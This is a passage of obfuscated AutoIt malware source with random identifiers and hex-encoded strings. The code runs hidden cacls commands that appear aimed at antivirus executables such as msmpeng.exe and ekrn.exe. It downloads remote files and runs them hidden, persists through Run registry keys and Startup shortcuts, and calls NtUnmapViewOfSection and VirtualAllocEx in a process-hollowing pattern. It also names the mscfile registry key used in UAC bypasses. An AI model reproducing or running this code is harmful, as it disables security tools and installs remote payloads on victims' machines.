- RunWait(@ComSpec & BinaryToString(fpwymajqzzqkowvzlqaajtd_akcwqyoephhdlxd(), 1) & "echo y| cac" & 'ls.exe "' & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & BinaryToString("0x22202F45202F43202F502022", 1) & jpdaayhe_iogzmlxfn_(BinaryToString(erulcciyswnkioxvurelundmsbcnrdrtiikgcwdw(), 1)) & BinaryToString("0x" & "3A52" & "22", 1), @SystemDir, @SW_HIDE)
- RunWait(@ComSpec & BinaryToString(kadeezfkdnhosrk()) & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & BinaryToString("0x22202F45202F43202F502022") & jpdaayhe_iogzmlxfn_("S-1" & "-5" & "-1" & "8") & rzwyukcynnwzcpeuvhaibwylv_dwcpeuz(), @SystemDir, @SW_HIDE)
- Else
- RunWait(@ComSpec & " /c" & " cac" & "ls" & ".e" & "x" & 'e "' & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & '" ' & "/" & "E " & necwdvikdmlps() & '"' & @UserName & ":" & 'F"', @SystemDir, @SW_HIDE)
- RunWait(@ComSpec & aepnqjn_qjuku() & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & ekvcpbkylj() & jpdaayhe_iogzmlxfn_(BinaryToString(jtwsvuynftmtffnqaf_yhukqcdwlzjbfochbvgbtyinf(), (0 - ((1 - (-1 + 3)) / (0 + 1))))) & BinaryToString("0" & "X3" & "A46" & "22"), @SystemDir, @SW_HIDE)
- RunWait(@ComSpec & BinaryToString(BinaryToString("0X3078323032663633323036333631363336633733326536353738363532303232"), Int(ChrW("49"))) & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & '" /E' & " /" & "C /" & "G " & '"' & jpdaayhe_iogzmlxfn_("S-" & BinaryToString(BinaryToString("0X3058333132443335", StringLen("d"))) & "-32-54" & "4") & ":" & "F" & '"', @SystemDir, @SW_HIDE)
- RunWait(@ComSpec & iycuavspyqdvlavjjr() & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & rpauaspgbfiugfmcqguoytjnnguyvsdmdvuazorvetjk() & jpdaayhe_iogzmlxfn_(cfeocbswufxzhmuxldpwzaoxhjtwwpeu()) & BinaryToString(nphhlxwrdduxeeoaanaqplxef()), @SystemDir, @SW_HIDE)
- EndIf
- EndFunc
- Func ytfojlx_kruklwmhosdufnetruxxriwje()
- Local $zy7pkzark7onq3aft6nwpdma02wtu6kmmod = "word Magic;"
- Return $zy7pkzark7onq3aft6nwpdma02wtu6kmmod
- EndFunc
- Func rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($wberil45yllmiey1iokfjbehvcygbcitleksw, $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa = "", $aplg8mxou4fzdatnetu7atcnnp = False, $sbmujomkrphhwpfmxk4z = True)
- Local $kbiqevjzu53pnfd6e208ei9sh, $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8
- If $aplg8mxou4fzdatnetu7atcnnp = False Then
- $kbiqevjzu53pnfd6e208ei9sh = InetRead($wberil45yllmiey1iokfjbehvcygbcitleksw, (1 * Int(ChrW(51))))
- If @error Then Return SetError((0 - ((-1 + 0) / (-1 + 0))), @error, False)
- For $fz3eclo13c4hpsztvduuwn10gcs = 1 To ((StringLen("1WRzz?aw9h7G4ivu") - (30 + 86)) / (Int(Chr("49")) * (-4 + -6)))
- If $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa <> "" Then
- $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8 = wgcf_gtdxrlslmygxwlyembab($kbiqevjzu53pnfd6e208ei9sh, kwunbssfrdmowoetvphkavhjsyiuxsapmapqcbbrxvqcsnb() & $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa)
- Else
- $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8 = wgcf_gtdxrlslmygxwlyembab($kbiqevjzu53pnfd6e208ei9sh)
- EndIf
- If NOT @error Then ExitLoop
- Next
- If @error OR $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8 = 0 Then Return SetError(((-2 + 0) / ((StringLen("2") / (1 / -1)) + (-4 / (-1 - 1)))), @error, False)
- Return SetError(@error, "", False)
- Else
- Local $n4c3hqn4eib0zrsardsumi3 = $aplg8mxou4fzdatnetu7atcnnp & ujthcdgsfonaohqptubzgrvvrjiwidzohg() & Random(((-1696 + (-434664 * 2)) / ((12 + 569) - (((-339 - 178) - 489) - -2371))), (-179 - (-51368366 / 5047)), (StringLen("N") + 0)) & BinaryToString("0x2E657865", 1)
- InetGet($wberil45yllmiey1iokfjbehvcygbcitleksw, $n4c3hqn4eib0zrsardsumi3, (2 + 1), 0)
- If @error Then Return SetError((((0 + (-1 / (0 + -1))) / ((0 + ((((1 - 2) / 1) + (-2 / -1)) - 2)) / 1)) - 0), @error, False)
- bokfzmjaxngdfest($n4c3hqn4eib0zrsardsumi3)
- If $sbmujomkrphhwpfmxk4z = True Then
- If $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa <> "" Then
- ShellExecute($n4c3hqn4eib0zrsardsumi3, $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa, "", "", @SW_HIDE)
- Else
- ShellExecute($n4c3hqn4eib0zrsardsumi3, "", "", "", @SW_HIDE)
- EndIf
- If @error Then Return SetError((0 + (-1 * (0 + 2))), @error, False)
- EndIf
- Return SetError(0, "", True)
- EndIf
- EndFunc
- Func jkq_orgovsecuydujwgdz_bsqb()
- Local $lfzazhuqjrgxw1s5evoeynr0nnszc31bqc32ipchkhzmlhkv
- $lfzazhuqjrgxw1s5evoeynr0nnszc31bqc32ipchkhzmlhkv = BinaryToString("0X" & "5c", 1)
- Return $lfzazhuqjrgxw1s5evoeynr0nnszc31bqc32ipchkhzmlhkv
- EndFunc
- Func kyiemgvkglcbwefrbffhahvbkmbstpdibcseshweafd()
- Local $ssh4vamgd2bhdwsf4bu9pkohb4b5k8gdw1imailveenbek1wx
- $ssh4vamgd2bhdwsf4bu9pkohb4b5k8gdw1imailveenbek1wx = "msmpeng.exe"
- Return $ssh4vamgd2bhdwsf4bu9pkohb4b5k8gdw1imailveenbek1wx
- EndFunc
- Func kr_drkpz_bhvyf()
- Local $t8fwyvai9m6nr6f7mvsuhtqq = "ProfileImagePath"
- Return $t8fwyvai9m6nr6f7mvsuhtqq
- EndFunc
- Func mefxpfswzswtjltataaxpbri()
- Return " /TR "
- EndFunc
- Func hidxeulzzhaepspsnqdmgj()
- Local $yfcex1vl3wc4z1wxt7vnuke = BinaryToString(azafjpmzmwynzucxglehiqbvspktez(), 1)
- Return $yfcex1vl3wc4z1wxt7vnuke
- EndFunc
- Func eesacdgfyhvfvfyofjvhn_aqdptkinsnfnavyfgmowe()
- Return "6F73742E657"
- EndFunc
- Func foiswliiodpbwmwok()
- Local $fhwfpfrahsjulbl73ek2tf5r46tki0
- $fhwfpfrahsjulbl73ek2tf5r46tki0 = "IA64"
- Return $fhwfpfrahsjulbl73ek2tf5r46tki0
- EndFunc
- Func yueedxubmdzahqhitosr()
- Return '"'
- EndFunc
- Func smtocknhnytfzkdktgmccdh()
- Local $aamwpgnz43iulwu7ib0dvof94uoy = "Magic"
- Return $aamwpgnz43iulwu7ib0dvof94uoy
- EndFunc
- Func whmkkomlugeszcuofazuyripy_lpqlnzornvjlm()
- Local $pc13blgilhbzek3 = BinaryToString("0X3437396437363666343232663631")
- Return $pc13blgilhbzek3
- EndFunc
- Func ttoltiicmgfiojuqigpzcqvdskcnrs($mpodnfy6il, $mwyrp6radfbjj2o18qu7lf5szz25ruvmuvpku)
- DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $mpodnfy6il, "ptr", $mwyrp6radfbjj2o18qu7lf5szz25ruvmuvpku)
- If @error Then Return SetError(1, 0, 0)
- Return Dec("1", 0)
- EndFunc
- Func stvqetqqbhmugrymqjlizak_yukxjp_jxbsdbc($n4c3hqn4eib0zrsardsumi3, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
- If IsAdmin() Then
- If NOT FileExists(@StartupCommonDir & vk_efwdqyrquoke() & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & BinaryToString("0X2E6C6E6B", 1)) Then FileCreateShortcut($n4c3hqn4eib0zrsardsumi3, @StartupCommonDir & BinaryToString("0x5c") & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & BinaryToString("0x2" & "e6c6" & "e" & "6b", Dec("1", 0)), "", "", $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8, @SystemDir & majopsiftujeynku(), "", Random(StringLen("Y"), (27 * Dec("2"))), @SW_SHOWMINNOACTIVE)
- Else
- If NOT FileExists(@StartupDir & tjsutkilvvikvlhprwl() & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & ezysl_kfjvhamboowzltqujiznkwtexb()) Then FileCreateShortcut($n4c3hqn4eib0zrsardsumi3, @StartupDir & BinaryToString("0" & "X5" & "C", (-1 - ((-1 + 2) * ((StringLen("iY") * 2) / -2)))) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & ".l" & "n" & "k", "", "", $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8, @SystemDir & "\Shell" & "3" & "2.dl" & "l", "", Random(1, (-1566 / ((-4 * -58) / -8))), @SW_SHOWMINNOACTIVE)
- EndIf
- EndFunc
- Func ebgjknluafaxae(ByRef $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai, $ffip5nhwpsdabovng)
- Local $4ldkhdkpxc8y6acgkqtovpbvla3shuz4nshpaymwjym = $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][0]
- Switch $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][Dec("1")]
- Case ((StringLen("N") / 1) + Dec("4"))
- rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((0 + -1) - (((-1 + -2) - 0) / 1))], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((1 * (4 / ((1 - 0) + -3))) + ((Dec("1", 0) * ((-2 + -1) - 0)) + Int(Chr(56))))], @TempDir)
- If @error Then Return SetError(@error, @extended, False)
- Case ((-2 * StringLen("pV")) / (Dec("1", 0) + ((-1 - 0) - Int(Chr("49")))))
- If $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][Dec("4", 0)] = 0 Then
- rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((1 + -2) - ((-9 / StringLen("?Z2")) - 0))], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][Dec("3", 0)])
- ElseIf $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][(-1 - (-20 / 4))] = 1 Then
- rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][StringLen("ef")], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][3], @ScriptDir)
- ElseIf $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][(((2 * -7) - -30) / (-12 / -3))] = 2 Then
- rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((-1 - -5) / 2)], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][3], @TempDir)
- ElseIf $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][StringLen("tKH5")] = 3 Then
- rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][2], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((-1 + -1) + ((14 + -39) / -5))], @AppDataDir)
- ElseIf $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((-12 + (-8 * -3)) / Dec("3"))] = (-4 - ((3 + (-1 * 7)) * Int(ChrW("50")))) Then
- rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][2], $e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][StringLen("A!t")], @UserProfileDir)
- EndIf
- If @error Then Return SetError(@error, @extended, False)
- Case ((1 - 0) * Int(ChrW("51")))
- wdeersmqmeia($rsfy8xu2owgjzzpao1)
- rdlgdfptivskkyxqfxdlwlykmoixafrwdtzeipeylucwgby($e7vdkwd0gkcchicumrksdakgqeqhuxkjsufzut4tbmhai[$ffip5nhwpsdabovng][((((-1 + 0) / -1) - 5) / -2)], "", @TempDir)
- If @error Then Return SetError(@error, @extended, False)
- Exit
- Case (Int(Chr("50")) - 0)
- Exit
- Case 1
- wdeersmqmeia($rsfy8xu2owgjzzpao1)
- Exit
- EndSwitch
- Return SetError(0, "", True)
- EndFunc
- Func bhdbndvdmngzjiwrafcrnttuviznobqoluwjkgnigeils()
- Local $rojfawysjwguajcmip01trks = BinaryToString(qvzvehgxhkjzwauiesstlqmfoohtexqnfxrzaudeciyqvnkiwf(), 1)
- Return $rojfawysjwguajcmip01trks
- EndFunc
- Func vxmdryesvdsvpmndwbrmgperdotapac()
- Local $uktyug89zh88korerx = "bdss.exe"
- Return $uktyug89zh88korerx
- EndFunc
- Func hsuakvazknwxbunnsnqlrovmtwlwqflka()
- Return "word["
- EndFunc
- Func joudnyrrydhvjpqr_qbpophdiyevazz_yvvdzrjtzr()
- Return BinaryToString("0X53697a65")
- EndFunc
- Func ktlqhfvxfwwmyfcvkonutgvlgpzijyjjvkk()
- Return BinaryToString("0x5c", 1)
- EndFunc
- Func riglxmjnhpwm()
- Return BinaryToString(vyniphfzozthprpzbfrh(), 1)
- EndFunc
- Func szr_hfbbpvvgvj()
- Return "%"
- EndFunc
- Func iycuavspyqdvlavjjr()
- Local $lzeyehyrnqq5liyx1hx9z7gzaf
- $lzeyehyrnqq5liyx1hx9z7gzaf = " /c" & " cacl" & "s" & "." & 'exe "'
- Return $lzeyehyrnqq5liyx1hx9z7gzaf
- EndFunc
- Func erulcciyswnkioxvurelundmsbcnrdrtiikgcwdw()
- Return "0x532d312d352d33322d353434"
- EndFunc
- Func fqvyfwcsqpxyfdtcwtjwoztevhzv()
- Return "word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;uint64 ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;uint64 SizeOfStackReserve;uint64 SizeOfStackCommit;uint64 SizeOfHeapReserve;uint64 SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes"
- EndFunc
- Func _lozqicnyrbvrlrvmyjguexpic()
- Return "ekrn.exe"
- EndFunc
- Func njfxffbauedkqqqwhmruht($h5t48vabyzkd2herlmqm5vkhsucjhfgjkc, $et6npgi8gxqaewdpftbhl = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890")
- Local $4gkzstnhi3gu, $fz3eclo13c4hpsztvduuwn10gcs
- For $fz3eclo13c4hpsztvduuwn10gcs = ((Dec("1", 0) / -1) - (0 - ((Dec("1") * 2) + 0))) To $h5t48vabyzkd2herlmqm5vkhsucjhfgjkc
- $4gkzstnhi3gu &= StringMid($et6npgi8gxqaewdpftbhl, Random(Dec("1", 0), Dec("3e", 0), 1), 1)
- Next
- Return $4gkzstnhi3gu
- EndFunc
- Func y_evhbxtkfwgubtphrqhnlpkscrshhpuotpajmno()
- Local $r9arpkpfbdymgd
- $r9arpkpfbdymgd = "]"
- Return $r9arpkpfbdymgd
- EndFunc
- Func ylpsnxwwmqxf()
- Return qncfzvydwgstqxunvotpueu_rxayyoqh_tdytykgytbidaxl()
- EndFunc
- Func nucbldtpuxmuekkoagchsndjpmwwupsxilqvhsp_dwpoeuhpmb()
- Return "HKEY_CURRENT_USER\Software\Classes\mscfile"
- EndFunc
- Func cbxstjeryqrhpoxgtbhxk_wzvgxzxr()
- Local $op9gm5ksfg08r9v4ktpp9ljiswoo6z
- $op9gm5ksfg08r9v4ktpp9ljiswoo6z = khafkkhqtszrrefksmbbhsfidtcporlvzkfqmagvxj()
- Return $op9gm5ksfg08r9v4ktpp9ljiswoo6z
- EndFunc
- Func etucwzrejgsaohyyngwcqpwbexyypvwcdvosoker()
- Local $dm12by9xghmuc
- $dm12by9xghmuc = BinaryToString("0x5c", 1)
- Return $dm12by9xghmuc
- EndFunc
- Func nphhlxwrdduxeeoaanaqplxef()
- Local $gcywbq1xs9facifalnu = BinaryToString("0X3078334134363232", 1)
- Return $gcywbq1xs9facifalnu
- EndFunc
- Func cfeocbswufxzhmuxldpwzaoxhjtwwpeu()
- Local $5zu8jv8ecomepw52u9eb3zkvwyxzddpmzovnqkyruwk4r
- $5zu8jv8ecomepw52u9eb3zkvwyxzddpmzovnqkyruwk4r = BinaryToString("0x532D312D352D3138", 1)
- Return $5zu8jv8ecomepw52u9eb3zkvwyxzddpmzovnqkyruwk4r
- EndFunc
- Func maypwe_uyzihndz()
- DllCall("kernel32.dll", "int", "ReleaseMutex", "long", $zlbr6bdl1mpx5nytfs1owp086kb3oqnutrgd)
- DllCall("kernel32.dll", "int", "CloseHandle", "long", $zlbr6bdl1mpx5nytfs1owp086kb3oqnutrgd)
- Exit
- EndFunc
- Func mxhcfimpbgdflxo($n4c3hqn4eib0zrsardsumi3, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
- Local $diactrta9rzcmrltyrimha9qn9nhk, $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm
- If @OSArch <> "X8" & "6" Then $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm = BinaryToString("0X3" & "634", (0 - (1 + -2)))
- If IsAdmin() Then
- $diactrta9rzcmrltyrimha9qn9nhk = enrmlznxprgqt() & $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm & "\Software\Microsoft\Win" & "dows\Cu" & "rr" & "ent" & "V" & "ers" & "ion" & "\R" & "un\"
- If RegRead($diactrta9rzcmrltyrimha9qn9nhk, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) <> $n4c3hqn4eib0zrsardsumi3 Then
- RegWrite($diactrta9rzcmrltyrimha9qn9nhk, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8, BinaryToString("0x5245475f535a"), $n4c3hqn4eib0zrsardsumi3)
- EndIf
- EndIf
- $diactrta9rzcmrltyrimha9qn9nhk = BinaryToString(ywcwajsbmizhdgeehnnudrkkjy(), (((-1 + 0) / StringLen("k")) / (-1 - 0)))
- If RegRead($diactrta9rzcmrltyrimha9qn9nhk, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) <> $n4c3hqn4eib0zrsardsumi3 Then
- RegWrite($diactrta9rzcmrltyrimha9qn9nhk, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8, BinaryToString(BinaryToString("0x3078353234353437356635333561"), Dec("1", 0)), $n4c3hqn4eib0zrsardsumi3)
- EndIf
- EndFunc
- Func zvfemlxfgjseznsojvjozicrnghtsvsrmjvhylylukereztt()
- Return "0x61766763632E657865"
- EndFunc
- Func fxsnghepq_i()
- Return "b" & "yt" & "e" & "["
- EndFunc
- Func mtfbsxdops()
- Local $vip1ebb1qvkest7 = DllCall("connect.dll", "long", "IsInternetConnected")
- If @error Then
- Return SetError(Dec("1", 0), 0, False)
- EndIf
- Return $vip1ebb1qvkest7[0] = 0
- EndFunc
- Func pcwvdlesitqrcmdjor()
- Local $i1ipqgsc4wkcmiouzfynkjgk12kzw3pcbhrfrpyvqzhk = "0x202F63206563686F20797C206361636C732E6578652022"
- Return $i1ipqgsc4wkcmiouzfynkjgk12kzw3pcbhrfrpyvqzhk
- EndFunc
- Func _bmqdbh_ufvrqlauvcklcelaoiklndngwhaegqkha($cbkz2vkdak, $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa, $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9 = 1)
- Local $spalxneztc4vkfnp, $qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o, $zth2v7z43vsjsy3phfdag7itc98qzbn4humyh
- If NOT IsArray($cbkz2vkdak) Then Return False
- If $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9 = (1 + Dec("1")) Then
- $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa = StringSplit($cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa, BinaryToString(BinaryToString("0X30783743", 1), StringLen("G")))
- If @error Then Return False
- $spalxneztc4vkfnp = $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa[(1 + 0)] & ingfcooqsfxecrya() & wosiyabviqgshcpdjsloinxncqrohwqkgqopism($fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9) & aansg_xxrufwsrqikjgpwhsrjlejs() & $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa[StringLen("Ky")] & BinaryToString(rdptebhehksbnzvuts_aeodaoryyyztuzrcmjlkhlddlycey()) & wosiyabviqgshcpdjsloinxncqrohwqkgqopism($cbkz2vkdak[1]) & BinaryToString(BinaryToString(BinaryToString("0X30783330353833323336"), ((1 - Int(ChrW("50"))) + ((-2 / (1 / (-1 / Int(ChrW("49"))))) / ((1 + (0 + (1 * -2))) - (-2 / (Dec("1", 0) / 1))))))) & $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa[((1 + (-1 * Dec("2"))) + Dec("4", 0))] & vfxwvy_gs_mjgnvkxdz_mxpxbesnsvy() & wosiyabviqgshcpdjsloinxncqrohwqkgqopism($cbkz2vkdak[StringLen("ID")])
- Return $spalxneztc4vkfnp
- EndIf
- $cbkz2vkdak[0] = $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9
- $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa = StringSplit($cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa, lwkbknwltfwrl())
- If @error Then Return False
- For $qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o = 0 To UBound($cbkz2vkdak) - (((0 + -1) - 0) / -1)
- $cbkz2vkdak[$qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o] = $cjccqqgtimqaste1jtzdaaslt09degrh4qkx5wqibbglvecaa[$qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o + ((1 - 2) / -1)] & fnhghgdwwyegz_uffrjftibmfxyhmifvsxmonefwem() & wosiyabviqgshcpdjsloinxncqrohwqkgqopism($cbkz2vkdak[$qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o])
- Next
- For $qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o = 0 To UBound($cbkz2vkdak) - (0 - (StringLen("?") / ((1 + 0) + (-2 / (0 + StringLen("x"))))))
- $zth2v7z43vsjsy3phfdag7itc98qzbn4humyh = Random(0, (UBound($cbkz2vkdak) - (Dec("1") - 0)), ((-1 / ((1 - 0) - 0)) / -1))
- $spalxneztc4vkfnp = $cbkz2vkdak[$qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o]
- $cbkz2vkdak[$qcke8fywuuubkjq6jkcgh8ms9jnmbjrrqrgamu5o] = $cbkz2vkdak[$zth2v7z43vsjsy3phfdag7itc98qzbn4humyh]
- $cbkz2vkdak[$zth2v7z43vsjsy3phfdag7itc98qzbn4humyh] = $spalxneztc4vkfnp
- Next
- $spalxneztc4vkfnp = ""
- For $fz3eclo13c4hpsztvduuwn10gcs = 0 To UBound($cbkz2vkdak) - ((1 / ((-1 - 0) + 0)) + Dec("2"))
- $spalxneztc4vkfnp &= $cbkz2vkdak[$fz3eclo13c4hpsztvduuwn10gcs] & "&"
- Next
- Return StringLeft($spalxneztc4vkfnp, StringLen($spalxneztc4vkfnp) - (0 + (0 + ((-1 / Int(Chr("49"))) / -1))))
- EndFunc
- Func ywcwajsbmizhdgeehnnudrkkjy()
- Return "0x484b45595f43555252454e545f555345525c536f6674776172655c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f6e5c52756e5c"
- EndFunc
- Func vdkbbykorgwrzvqphxzupgtfmcireq_ajbyaxwyezecmzw()
- Return BinaryToString("0x5B22")
- EndFunc
- Func xxstmhlpmbibgvemtxxswdorzdhaqgglqohwhuhoabvzwf()
- Local $vcszyrlktd1ygoamvj3gtl40cf
- $vcszyrlktd1ygoamvj3gtl40cf = ".l" & "nk"
- Return $vcszyrlktd1ygoamvj3gtl40cf
- EndFunc
- Func yudegdcvnivlxsfkrhgsdpuctiguwhzeyxyovq_iz()
- Local $44pxlim9sxt9aydjtbgg = vdkbbykorgwrzvqphxzupgtfmcireq_ajbyaxwyezecmzw()
- Return $44pxlim9sxt9aydjtbgg
- EndFunc
- Func igbeploplr_lotsclxxroi_hkaewbqnllq()
- Local $0s9fcuorv9ry1unk = "0x583836"
- Return $0s9fcuorv9ry1unk
- EndFunc
- Func aytbzrapgkyw()
- Local $g15jcv7tzwjvbkalbrua
- $g15jcv7tzwjvbkalbrua = "0X50726f636573736f724e616d65537472696e67"
- Return $g15jcv7tzwjvbkalbrua
- EndFunc
- Func raeay_odizwtovx()
- Return "HKEY_LOCAL_MACHINE\SOFTWARE\Micros" & "oft\Windo" & "ws N" & "T\CurrentVersion\ProfileList"
- EndFunc
- Func lyqvgdzzpplfyyezogknumhmdcpindeauspqhil()
- Local $ll7giyhzvql91atusllcjiq58esrr4 = "0x583836"
- Return $ll7giyhzvql91atusllcjiq58esrr4
- EndFunc
- Func _wghyt_xlcssv_xhvthilhalockwjvbaobkufvwyigqbobcyr()
- Local $yhoyceocuqvux1prl8kvc = "]"
- Return $yhoyceocuqvux1prl8kvc
- EndFunc
- Func kexnnlbgfablhpkcziweggosbkcp()
- Return BinaryToString("0X5D", 1)
- EndFunc
- Func ztcpagvsrzpo($mpodnfy6il, $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul)
- Local $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $mpodnfy6il, "ptr", 0, "dword_ptr", $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul, "dword", 12288, "dword", Dec("40", 0))
- If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then Return SetError(Int(Chr(49)), 0, 0)
- Return $gwzzqtmpqf7zmwclp1y5ow17jx7g[0]
- EndFunc
- Func wgszriylkcmzjmssqabzox()
- Local $ujycpijhgr07chzfeopltpg4nmebhwy = "IA64"
- Return $ujycpijhgr07chzfeopltpg4nmebhwy
- EndFunc
- Func azafjpmzmwynzucxglehiqbvspktez()
- Return "0X61767075692E657865"
- EndFunc
- Func zkkurjoliostulnpoaidhrzkdsrfpbertxc()
- Local $htuz7o2hgpn5rxfddw
- $htuz7o2hgpn5rxfddw = "De"
- Return $htuz7o2hgpn5rxfddw
- EndFunc
- Func aepnqjn_qjuku()
- Local $f2v8rx7xiden
- $f2v8rx7xiden = bkmyzmqofazpp_gknotdxwesztvdldofdzwpg()
- Return $f2v8rx7xiden
- EndFunc
- Func vfxwvy_gs_mjgnvkxdz_mxpxbesnsvy()
- Local $lokiaebnvexfcvfisacqly8ndwfcmtsmz
- $lokiaebnvexfcvfisacqly8ndwfcmtsmz = "="
- Return $lokiaebnvexfcvfisacqly8ndwfcmtsmz
- EndFunc
- Func supduuqtf_m_qp()
- Return "]"
- EndFunc
- Func xgtmdyqpzrxaz($znjmjyfdrzky2j45fkvi)
- Local $5rdcdngpsr = DllStructCreate("int" & "64")
- DllStructSetData($5rdcdngpsr, StringLen("W"), -StringLen("E") * ($znjmjyfdrzky2j45fkvi * Dec("A")))
- DllCall("ntdll.dll", "dword", "ZwDelayExecution", "int", 0, "ptr", DllStructGetPtr($5rdcdngpsr))
- EndFunc
- Func wfynrtnxvldsaqsxxxjvingsuonfhpzclgygl()
- Return tsaooquzydscefmkymbbhvkddbudtc_ijerzp()
- EndFunc
